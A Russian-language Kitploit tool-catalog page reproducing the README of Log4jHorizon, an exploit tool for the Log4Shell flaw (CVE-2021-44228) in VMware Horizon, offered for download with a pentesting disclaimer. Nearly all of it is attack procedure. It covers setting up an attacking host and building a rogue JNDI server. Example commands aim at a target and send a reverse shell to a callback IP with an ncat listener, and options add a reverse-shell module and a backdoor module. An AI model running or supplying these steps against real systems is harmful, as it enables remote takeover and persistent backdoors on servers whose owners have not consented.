Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Log4jHorizon — Эксплуатация CVE-2021-44228 в VMWare Horizon для удалённого выполнения кода и не только. | Kitploit
Инструменты/GitHubGitHub/puzzlepeaches/log4jhorizon
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubpuzzlepeaches/log4jhorizon

Log4jHorizon

Эксплуатация CVE-2021-44228 в VMWare Horizon для удалённого выполнения кода и не только.

Репозиторий
1201344 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Log4jHorizon

Эксплуатация CVE-2021-44228 в VMWare Horizon для удалённого выполнения кода и не только.

  • Crossing the Log4j Horizon - A Vulnerability With No Return

Код и README.md на этот раз немного разрознены. Обновления скоро!

Зачем?

PoC-эксплойты для этой уязвимости разбросаны по разным источникам и требуют ручного выполнения. Этот репозиторий автоматизирует процесс эксплуатации. Смотрите пост в блоге выше для рекомендаций по пост-эксплуатации.

Установка

Этот репозиторий можно использовать вручную или с помощью Docker.

Ручная установка

Чтобы загрузить и запустить эксплойт вручную, выполните следующие шаги. Сначала убедитесь, что на вашем атакующем хосте установлены Java и Maven. Для этого с помощью apt в дистрибутивах на основе Debian выполните следующую команду:

root@kitploit:~
apt update && apt install openjdk-11-jre maven

Клонируйте репозиторий GitHub и установите все зависимости Python:

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jHorizon \
    && cd Log4jHorizon && pip3 install -r requirements.txt

Из корня репозитория Log4jHorizon скомпилируйте проект Rogue-Jndi с помощью следующей команды:

root@kitploit:~
mvn package -f utils/rogue-jndi/

Установка с помощью Docker

Сначала убедитесь, что на вашем атакующем хосте установлен Docker. (Я не буду объяснять, как это сделать)

После этого выполните следующую команду, чтобы клонировать репозиторий и собрать Docker-образ, который мы будем использовать.

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jHorizon \
    && cd Log4jHorizon && docker build -t Log4jHorizon .

Чтобы запустить контейнер, выполните команду, аналогичную следующей, добавив свои флаги командной строки. Обратите внимание, что контейнер не перехватит обратную оболочку. Вам нужно создать ncat-слушатель в отдельной сессии оболочки:

root@kitploit:~
docker run -it -p 1389:1389 Log4jHorizon \
    -r -t horizon.acme.com -i 192.168.1.1 -p 4444

Использование

root@kitploit:~
usage: exploit.py [-h] -t URL -i CALLBACK [-p PORT] [-r] [-b]

optional arguments:
  -h, --help            show this help message and exit
  -t URL, --target URL  VMWare Horizon IP
  -i CALLBACK, --ip CALLBACK
                        Callback IP for payload delivery and reverse shell.
  -p PORT, --port PORT  Callback port for reverse shell.
  -r, --revshell        Module to establish reverse shell using node.exe.
  -b, --backdoor        Module to add backdoor.

Примеры

Получите обратную оболочку с помощью инструмента, установленного в вашей локальной системе:

root@kitploit:~
python3 exploit.py -r -t horizon.acme.com -p 442 -i 192.168.1.1

Отказ от ответственности

Этот инструмент предназначен для использования во время тестирования на проникновение; использование этого инструмента для атак на цели без предварительного взаимного согласия незаконно. Ответственность за соблюдение всех применимых местных, государственных и федеральных законов лежит на конечном пользователе. Разработчики не несут ответственности и не отвечают за любое неправомерное использование этой программы.

Скачать инструмент